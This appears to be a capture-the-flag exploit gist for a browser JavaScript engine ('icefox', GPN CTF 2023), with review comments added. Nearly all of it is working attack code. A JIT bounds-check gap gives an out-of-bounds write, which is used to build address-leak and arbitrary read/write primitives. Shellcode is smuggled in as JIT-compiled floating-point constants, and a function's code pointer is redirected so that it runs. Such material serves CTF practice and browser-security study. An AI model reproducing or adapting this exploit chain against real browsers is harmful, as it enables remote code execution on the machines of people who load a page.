@anvbis
Created July 18, 2023 09:27
2023_gpnctf_icefox.js
// One 8-byte scratch buffer exposed through two typed-array views, so the same
// 64 bits can be written as an unsigned integer and read back as a double.
const _buf = new ArrayBuffer(Float64Array.BYTES_PER_ELEMENT);
const _flt = new Float64Array(_buf);
const _int = new BigUint64Array(_buf);
/**
 * Reinterprets a 64-bit unsigned integer as an IEEE-754 double without any
 * numeric conversion: the bits are stored through the BigUint64Array view and
 * read back through the Float64Array view of the same buffer.
 *
 * @param {bigint} x - Raw 64-bit pattern.
 * @returns {number} The double whose in-memory representation is `x`.
 */
const itof = (x) => {
  _int[0] = x;
  const asDouble = _flt[0];
  return asDouble;
};
/**
 * Returns a new array holding six hard-coded double literals.
 *
 * The return value is never used in this script. What the script uses is the
 * function object itself: it is called one million times right after this
 * definition, and the final stage reads and overwrites the 8 bytes at
 * `addrof(pwn) + 0x28n` before calling `pwn()` once more.
 *
 * NOTE(review): the literals appear to be chosen for their raw 64-bit patterns
 * rather than their numeric values (the final stage scans for a 0xdeadbeef
 * marker and targets the address 8 bytes past it). Presumably they are meant
 * to end up as immediates inside JIT-compiled code; this cannot be confirmed
 * from this file alone. For triage, a hot function that only returns odd
 * floating-point constants is a recognisable indicator of this pattern.
 *
 * @returns {number[]} Array of six doubles.
 */
const pwn = () => {
return [
1.8457939563e-314,
4.350248014025832e+199,
-6.032030672671943e-264,
1.6476837785e-314,
6.805647357708692e+38,
2.605888325577797e-284
];
};
// Calls pwn() one million times and discards every result.
// NOTE(review): presumably a warm-up so the engine promotes pwn to
// JIT-compiled code before the later stages inspect it — confirm against the
// target engine's tiering thresholds.
for (let i = 0; i < 1_000_000; i++) {
pwn();
}
/**
 * Allocates four arrays in a fixed order, performs two indexed stores into the
 * first one, and returns the other three.
 *
 * @param {number} x - Index multiplier. With 0 both stores target arr[0];
 *   with 1 they target arr[10] and arr[11], past arr's three initial elements.
 * @returns {{oob: number[], rdw: BigUint64Array, obj: object[]}} The three
 *   arrays allocated after `arr`.
 *
 * NOTE(review): in a spec-conforming engine the x = 1 stores would only grow
 * `arr` and leave `oob` untouched. The rest of the script indexes oob[13] and
 * oob[39] even though oob is created with three elements, so it evidently
 * expects these stores to have altered oob. Presumably the JIT-compiled store
 * path in the target build omits a bounds check and the values land in memory
 * adjacent to arr. The engine defect itself is not visible in this file.
 */
function foo(x) {
// Allocation order matters to the callers below: they reach rdw and obj
// through fixed indexes into oob (13 and 39).
let arr = new Array(1.1, 2.2, 3.3);
let oob = new Array(1.1, 2.2, 3.3);
let rdw = new BigUint64Array(1);
let obj = new Array({a: 1}, {b: 2}, {c: 3});
// Stores the bit patterns 0x133700000000 and 0x133700001337 (as doubles) at
// indexes 10*x and 11*x of arr.
// NOTE(review): looks like these are meant to overwrite size fields belonging
// to oob — verify against the target build's array layout.
arr[10 * x] = itof(0x133700000000n);
arr[11 * x] = itof(0x133700001337n);
return { oob, rdw, obj };
}
// Calls foo one million times with x = 0, where both stores stay at arr[0].
// NOTE(review): presumably this gets foo JIT-compiled while it has only ever
// seen in-bounds indexes — confirm against the target engine.
for (let i = 0; i < 1_000_000; i++) {
foo(0);
}
// Single call with x = 1: the stores now target arr[10] and arr[11]. The
// returned arrays are the ones every later helper operates on.
const { oob, rdw, obj } = foo(1);
/**
 * Stores `o` in obj[0] and returns the low 48 bits of rdw[0], read while
 * oob[13] temporarily holds the value of oob[39]. oob[13] is restored before
 * returning.
 *
 * NOTE(review): presumably oob[13] overlaps rdw's data pointer and oob[39]
 * holds the address of obj's element storage, so the read yields the pointer
 * stored for `o`. Both indexes depend on the target build's heap layout and
 * cannot be verified from this file.
 *
 * @param {*} o - Value placed into obj[0].
 * @returns {bigint} rdw[0] masked with 0xffffffffffff.
 */
const addrof = o => {
// Saved so the slot can be put back after the read.
let tmp = oob[13];
oob[13] = oob[39];
obj[0] = o;
// Keep only the low 48 bits of the 64-bit value.
let ret = rdw[0] & 0xffffffffffffn;
oob[13] = tmp;
return ret;
};
/**
 * Returns rdw[0] read while oob[13] temporarily holds `p` reinterpreted as a
 * double. oob[13] is restored before returning.
 *
 * NOTE(review): presumably oob[13] overlaps rdw's data pointer, which would
 * make this an 8-byte read at address `p` — layout not verifiable here.
 *
 * @param {bigint} p - 64-bit value written (as a double) into oob[13].
 * @returns {bigint} The 64-bit value observed through rdw[0].
 */
const read = p => {
// Saved so the slot can be put back after the read.
let tmp = oob[13];
oob[13] = itof(p);
let ret = rdw[0];
oob[13] = tmp;
return ret;
};
/**
 * Assigns `x` to rdw[0] while oob[13] temporarily holds `p` reinterpreted as a
 * double. oob[13] is restored afterwards.
 *
 * NOTE(review): presumably oob[13] overlaps rdw's data pointer, which would
 * make this an 8-byte write at address `p` — layout not verifiable here.
 *
 * @param {bigint} p - 64-bit value written (as a double) into oob[13].
 * @param {bigint} x - 64-bit value stored through rdw[0].
 */
const write = (p, x) => {
// Saved so the slot can be put back after the store.
let tmp = oob[13];
oob[13] = itof(p);
rdw[0] = x;
oob[13] = tmp;
};
// Final stage: locate a marker relative to pwn and redirect a pointer to it.
//
// Reads the 8 bytes at (value returned by addrof(pwn)) + 0x28.
// NOTE(review): the 0x28 offset is presumably specific to the target build's
// function object layout — confirm before relying on this description.
let jit = read(addrof(pwn) + 0x28n);
// Follows that value once more; `code` is the base for the scan below.
let code = read(jit);
// Scans offsets 512..4095 from `code`, one byte at a time, for an 8-byte value
// equal to 0xdeadbeef. `var` is used so `i` is still in scope after the loop.
// If no offset matches, the loop ends with i === 4096n and the script carries
// on regardless; there is no failure check.
for (var i = 512n; i < 4096n; i++) {
if (read(code + i) == 0xdeadbeefn) break;
}
// Address 8 bytes past the matched offset.
let shellcode = code + i + 8n;
// Overwrites the 8 bytes at `jit` with that address, then calls pwn().
// NOTE(review): this step depends on JIT-emitted constants being reachable as
// executable bytes and on the pointer at `jit` being writable. Constant
// blinding and integrity protection of code pointers are the mitigations
// aimed at these two conditions.
write(jit, shellcode);
pwn();